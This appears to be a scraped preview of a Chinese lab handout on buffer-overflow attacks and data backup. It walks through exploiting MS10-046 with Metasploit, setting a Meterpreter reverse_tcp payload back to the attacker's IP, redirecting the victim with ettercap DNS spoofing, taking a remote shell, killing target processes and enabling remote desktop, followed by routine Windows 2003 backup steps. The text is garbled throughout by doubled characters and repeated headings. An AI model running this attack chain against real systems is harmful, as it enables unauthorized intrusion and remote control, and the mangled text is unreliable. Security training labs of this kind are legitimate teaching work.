利用漏洞進行溢出攻擊及數(shù)據(jù)備份_第1頁
利用漏洞進行溢出攻擊及數(shù)據(jù)備份_第2頁
利用漏洞進行溢出攻擊及數(shù)據(jù)備份_第3頁
免費預(yù)覽已結(jié)束,剩余7頁可下載查看

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)

文檔簡介

1、無利用漏洞進行溢出攻擊及數(shù)據(jù)備份利用漏洞進行溢出攻擊及數(shù)據(jù)備份1.1. 實訓(xùn)目的實訓(xùn)目的( (后果自負后果自負) )利用系統(tǒng)漏洞進行溢出攻擊是一種現(xiàn)今網(wǎng)絡(luò)上常用的一種攻擊手段,它利用 C 等高級語言對于數(shù)據(jù)、指針以及寄存器等保護不足及程序員在開發(fā)系統(tǒng)時的過錯,通過多重手段屏蔽用戶感知,從而獲取用戶所傳遞信息或者誤導(dǎo)用戶的網(wǎng)絡(luò)應(yīng)用操作。 本次練習(xí)主要目的是體驗利用漏洞進行緩沖區(qū)溢出攻擊。數(shù)據(jù)備份是系統(tǒng)管理員日常進行系統(tǒng)、數(shù)據(jù)維護所必需掌握的技巧及手段,本次練習(xí)應(yīng)用 windows2003 自帶的備份工具進行數(shù)據(jù)備份。2.2. 實訓(xùn)所需條件及環(huán)境實訓(xùn)所需條件及環(huán)境硬件設(shè)備:硬件設(shè)備:局域網(wǎng)(含機柜

2、、配線架、交換機等) 、臺式 PC 機軟件支撐:軟件支撐:Windows 2003、Windows XP 以及 BackTract5 虛擬機網(wǎng)絡(luò)拓撲結(jié)構(gòu):網(wǎng)絡(luò)拓撲結(jié)構(gòu):3.3. 實訓(xùn)內(nèi)容實訓(xùn)內(nèi)容3.13.1 利用利用 metasploitmetasploit 進行溢出攻擊練習(xí)進行溢出攻擊練習(xí)使用 metasploit 開啟攻擊無首先是進入 Metasploit??梢渣c擊【應(yīng)用程序】【BackTrack】【Exploitation Tools】【Network Exploitation Tools】【Metasploit Framewrok】進入 Metasploit 外,也可以在圖形界面下打開

3、任意一個終端, 直接輸入 msfconsole 命令來進入 Metasploit。此時可以看到當(dāng)前包含代碼數(shù)量、參數(shù)狀態(tài)及最新版本等,如下圖所示,進入 msf 的工作平臺后,輸入 search ms10-046 查詢攻擊代碼的存放路徑, 即可看到名為ms10_046_shortcut_icon_dllloader的相關(guān)信息。接下來,使用如下指令載入攻擊代碼:Use windows/browser/ms10_046_shortcut_icon_dllloader回車后如下圖所示,表示載入攻擊代碼成功。此時,可以通過 showoptions 來查看可以(必需)進行的參數(shù)配置。無在了解需進行的攻擊參

4、數(shù)的配置后,接下來就可以使用 set 命令來依次配置參數(shù)。其中,還需設(shè)置 PAYLOAD 為獲取 windows 的 shellcode,即 windows/metepreter/reverse_tcp。此外,由于后面攻擊還要使用 ettercap 對目標進行 DNS 欺騙攻擊,所以要將反彈端口的目的地設(shè)置為自身 IP,即設(shè)置 LHOST 為自身 IP。具體命令如下:setSRVHOST攻擊者自身 IPsetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST攻擊者自身 IPexploit無進行 dns 欺騙攻擊參照在欺騙攻擊練習(xí)中的操作敘述及練習(xí)視頻的

5、說明,完成對etter.dns 的配置。注意這里域名對應(yīng)的 ip 地址必需根據(jù)自己的機器的實際 ip 地址進行。完成域名的配置后,使用 ifconfig 查看使用的網(wǎng)絡(luò)適配器的符號,然后發(fā)起欺騙攻擊,如下圖所示。無入侵目標主機目標主機 (Windows XP) 上打開瀏覽器, 輸入網(wǎng)址 http:/www.xxx并回車,會發(fā)現(xiàn)瀏覽器的響應(yīng)會變得緩慢。稍等數(shù)秒后,會發(fā)現(xiàn)在目標主機上的瀏覽器上原本應(yīng)顯示為 www.xxx 的主頁, 突然變成了一個名為30XHJnSkKNjR 的共享目錄。如下圖所示。打開攻擊主機 BackTrack5 的 Metasploit 終端下, 會看

6、到目標主機因DNS 欺騙而導(dǎo)致的重定向訪問,此時目標主機被強制運行了攻擊主機即 30 上 Metasploit 執(zhí)行的漏洞攻擊代碼。 于是在成功溢出后,攻擊主機拿到了一個反向溢出 Shell。如下圖所示,即可獲無取到一個 Meterpreter Session(注意倒數(shù)第三行) 。此時,攻擊者輸入 back 命令回到 Metasploit 的根目錄后,就可以使用 sessions 查看這個反向溢出 Shell 的 ID 號及其相關(guān)信息, 然后再調(diào)用該 ID 即可。具體命令如下:sessionssessions-i1參數(shù)解釋:-i num 該參數(shù)用于調(diào)用不同 ID 號的成

7、功溢出 Shell,后跟的 num 為ID 號。無依次輸入上述命令,就可以成功調(diào)用該反向溢出 Shell,此時會看到提示符從msf變成了meterpreter,如下圖所示,此時鍵入 ps 即可看到目標主機所有運行的進程。攻擊操作練習(xí)目標主機打開計算器,如下圖所示,請你使用 linux 的 kill 指令將計算器的進程殺除。使用命令 run getgui e,看看能否開啟目標主機的運程管理服務(wù)。3.23.2 掛馬攻擊練習(xí)掛馬攻擊練習(xí)無開啟 windows2003,并運行 IIS 服務(wù)。然后使用如下指令,設(shè)計掛馬網(wǎng)頁。修改3.1中的dns 配置, 將域名對應(yīng)的ip地址指向windows2003,并

8、重復(fù) 3.1 的整個攻擊過程??纯丛谀繕藱C器上,能否察覺被攻擊機入侵的痕跡?3.33.3 數(shù)據(jù)備份練習(xí)數(shù)據(jù)備份練習(xí)實驗環(huán)境準備啟動 windows2003(以下簡稱主機) ,并配置 IIS 服務(wù)器。然后復(fù)制默認網(wǎng)站工作目錄下的所有文件夾及其文件到“D:WebBackUp”目錄下。文件狀態(tài)查詢主機查詢備份前文件夾(即上面需要進行備份的 IIS 默認網(wǎng)站文件及文件夾)的狀態(tài)(文件夾中文件數(shù)量、名稱、大小),記錄其狀態(tài)為 S1。文件備份(1) 主機選擇“開始-所有程序-附件-系統(tǒng)工具-備份”菜單項,彈出“備份或還原向?qū)А睂υ捒颍瑔螕簟跋乱徊健卑粹o。(2) 主機選擇“備份文件和設(shè)置(A)”單選按鈕,單

9、擊“下一步”按鈕。(3) 主機選擇 “讓我選擇要備份的內(nèi)容(L)” 單選按鈕, 單擊 “下無一步”按鈕。(4) 主機選擇備份項目為“D:WebBackUp” ,單擊“下一步”按鈕。(5) 主機選擇備份文件的位置為 “D:” , 備份文件名稱保持默認,單擊“下一步”按鈕。(6) 主機單擊“完成”按鈕,開始備份操作。(7) 稍等片刻后,完成備份操作。主機單擊“關(guān)閉”按鈕,關(guān)閉“備份進度”對話框。原始文件刪除主機刪除“D:WebBackUp”文件夾及其文件。文件還原(1) 主機雙擊“D:Backup.bkf”文件,彈出“備份或還原向?qū)А睂υ捒?,單擊“下一步”按鈕。(2) 主機選擇“還原文件和設(shè)置(R)”單選按鈕,單擊“下一步”按鈕。(3) 主機勾選要還原的項目為“D:Backup.bkf”,

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論